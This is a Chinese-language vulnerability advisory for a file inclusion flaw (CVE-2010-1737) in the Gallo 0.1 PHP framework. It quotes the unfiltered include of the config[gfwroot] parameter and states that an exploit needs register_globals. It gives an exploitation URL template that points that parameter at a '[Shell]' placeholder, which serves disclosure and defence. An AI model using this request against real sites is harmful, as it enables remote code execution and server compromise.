Gallo config[gfwroot]参数文件包含漏洞
添加时间:
2010-05-08
系统编号:
WAVDB-01589
BugCVE: CVE-2010-1737
BUGTRAQ: 39890
影响版本:
krlosaqp Gallo 0.1
程序介绍:
漏洞利用:
2010-05-08
系统编号:
WAVDB-01589
BugCVE: CVE-2010-1737
BUGTRAQ: 39890
影响版本:
krlosaqp Gallo 0.1
程序介绍:
Gallo是一个小型的PHP框架。
漏洞分析:
Gallo没有正确地过滤提交给core/includes/gfw_smarty.php页面的config[gfwroot]参数便用于包含文件:
<?php
include ($config['gfwroot'] . 'libs/smarty/Smarty.class.php');
class GfwSmarty extends Smarty {
function GfwSmarty () {
global $config;
$this->Smarty();
$this->template_dir = $config['approot'] . 'sites/main/templates/';
$this->compile_dir = $config['approot'] . 'compiles/';
$this->config_dir = $config['approot'] . 'configs/';
$this->cache_dir = $config['approot'] . 'cache/';
$this->compile_check = $config['compile'];
$this->force_compile = $config['compile'];
$this->caching = $config['caching'];
$this->assign('app_name', 'Maps');
}
}
?>
远程攻击者可以通过提交恶意请求导致包含任意本地或外部资源。成功攻击要求打开了register_globals。
漏洞利用:
http://www.example.com/[Gallo_path]/core/includes/gfw_smarty.php?config[gfwroot]=[Shell]
解决方案:
厂商补丁:
krlosaqp
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/gallo/
信息来源:
<*来源:cr4wl3r
链接:http://secunia.com/advisories/39706
*>